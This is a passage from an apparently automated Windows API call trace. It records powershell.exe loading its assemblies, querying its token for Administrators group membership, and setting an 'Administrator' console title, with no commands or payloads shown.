lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0048.374] GetLastError () returned 0x2 [0048.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.452] GetLastError () returned 0xcb [0048.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.452] GetLastError () returned 0xcb [0048.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.453] GetLastError () returned 0xcb [0048.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.453] GetLastError () returned 0xcb [0048.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.464] GetLastError () returned 0xcb [0048.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x19e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0048.525] GetLastError () returned 0x2 [0048.525] SetErrorMode (uMode=0x1) returned 0x1 [0048.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x19e8c4 | out: lpFileInformation=0x19e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.525] GetLastError () returned 0x2 [0048.525] SetErrorMode (uMode=0x1) returned 0x1 [0048.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.834] GetLastError () returned 0x0 [0048.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.835] GetLastError () returned 0x0 [0048.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.835] GetLastError () returned 0x0 [0048.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.840] GetLastError () returned 0xcb [0048.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.843] GetLastError () returned 0xcb [0048.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.843] GetLastError () returned 0xcb [0048.847] CoCreateGuid (in: pguid=0x19e9a4 | out: pguid=0x19e9a4*(Data1=0xb1a16f17, Data2=0xc4ad, Data3=0x40e7, Data4=([0]=0x9e, [1]=0x58, [2]=0xa8, [3]=0xb9, [4]=0x92, [5]=0x1a, [6]=0xb7, [7]=0x70))) returned 0x0 [0048.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.851] GetLastError () returned 0xcb [0048.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.853] GetLastError () returned 0xcb [0048.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0048.855] GetLastError () returned 0xcb [0048.865] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0048.866] GetLastError () returned 0x0 [0048.868] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x19e884 | out: lpConsoleScreenBufferInfo=0x19e884) returned 1 [0048.868] GetLastError () returned 0x0 [0048.872] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0048.873] GetLastError () returned 0x0 [0048.873] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x19e884 | out: lpConsoleScreenBufferInfo=0x19e884) returned 1 [0048.873] GetLastError () returned 0x0 [0048.873] GetVersionExW (in: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0048.873] GetLastError () returned 0x0 [0048.875] GetCurrentProcess () returned 0xffffffff [0048.875] GetLastError () returned 0x3f0 [0048.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e894 | out: TokenHandle=0x19e894*=0x34c) returned 1 [0048.876] GetLastError () returned 0x3f0 [0048.879] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19e8ec | out: TokenInformation=0x0, ReturnLength=0x19e8ec) returned 0 [0048.879] GetLastError () returned 0x7a [0048.880] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x233390 [0048.880] GetLastError () returned 0x7a [0048.880] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x233390, TokenInformationLength=0x4, ReturnLength=0x19e8ec | out: TokenInformation=0x233390, ReturnLength=0x19e8ec) returned 1 [0048.880] GetLastError () returned 0x7a [0048.882] DuplicateTokenEx (in: hExistingToken=0x34c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x19e8a4 | out: phNewToken=0x19e8a4*=0x344) returned 1 [0048.882] GetLastError () returned 0x7f [0048.882] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19e8ec | out: TokenInformation=0x0, ReturnLength=0x19e8ec) returned 0 [0048.882] GetLastError () returned 0x7a [0048.883] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x233370 [0048.883] GetLastError () returned 0x7a [0048.883] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x233370, TokenInformationLength=0x4, ReturnLength=0x19e8ec | out: TokenInformation=0x233370, ReturnLength=0x19e8ec) returned 1 [0048.883] GetLastError () returned 0x7a [0048.883] CheckTokenMembership (in: TokenHandle=0x344, SidToCheck=0x2b38b0c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19e880 | out: IsMember=0x19e880) returned 1 [0048.883] GetLastError () returned 0x7a [0048.884] CloseHandle (hObject=0x344) returned 1 [0048.884] GetLastError () returned 0x7a [0048.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e394, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.884] GetLastError () returned 0x7a [0048.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.884] GetLastError () returned 0x7a [0048.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.884] GetLastError () returned 0x7a [0048.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.884] GetLastError () returned 0x7a [0048.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e394, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.914] GetLastError () returned 0x7a [0048.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.914] GetLastError () returned 0x7a [0048.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.914] GetLastError () returned 0x7a [0048.922] GetConsoleTitleW (in: lpConsoleTitle=0x247ac0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0048.922] GetLastError () returned 0x7a [0048.947] GetConsoleTitleW (in: lpConsoleTitle=0x247ac0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0048.947] GetLastError () returned 0x7a [0048.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e38c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.948] GetLastError () returned 0x7a [0048.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.948] GetLastError () returned 0x7a [0048.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.948] GetLastError () returned 0x7a [0048.952] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0048.952] GetLastError () returned 0x7a [0048.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.953] GetLastError () returned 0x7a [0048.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.953] GetLastError () returned 0x7a [0048.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.953] GetLastError () returned 0x7a [0048.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.953] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.988] GetLastError () returned 0x7a [0048.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.989] GetLastError () returned 0x7a [0048.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.989] GetLastError () returned 0x7a [0048.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.989] GetLastError () returned 0x7a [0049.048] SetConsoleCtrlHandler (HandlerRoutine=0x285384a, Add=1) returned 1 [0049.048] GetLastError () returned 0x7a [0049.066] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344 [0049.066] GetLastError () returned 0x0 [0049.068] CoCreateGuid (in: pguid=0x19e8b8 | out: pguid=0x19e8b8*(Data1=0xc0bbbdf8, Data2=0xed81, Data3=0x4fde, Data4=([0]=0x88, [1]=0xc8, [2]=0xf5, [3]=0x41, [4]=0x66, [5]=0x4c, [6]=0xa1, [7]=0x3e))) returned 0x0 [0049.148] WinSqmIsOptedIn () returned 0x0 [0049.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.149] GetLastError () returned 0xcb [0049.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.154] GetLastError () returned 0xcb [0049.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.155] GetLastError () returned 0xcb [0049.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.157] GetLastError () returned 0xcb [0049.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.158] GetLastError () returned 0xcb [0049.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.164] GetLastError () returned 0xcb [0049.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.164] GetLastError () returned 0xcb [0049.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.165] GetLastError () returned 0xcb [0049.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.167] GetLastError () returned 0xcb [0049.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.184] GetLastError () returned 0xcb [0049.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.187] GetLastError () returned 0xcb [0049.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.187] GetLastError () returned 0xcb [0049.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.548] GetLastError () returned 0xcb [0049.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.548] GetLastError () returned 0xcb [0049.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.548] GetLastError () returned 0xcb [0049.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.548] GetLastError () returned 0xcb [0049.598] GetFullPathNameW (in: 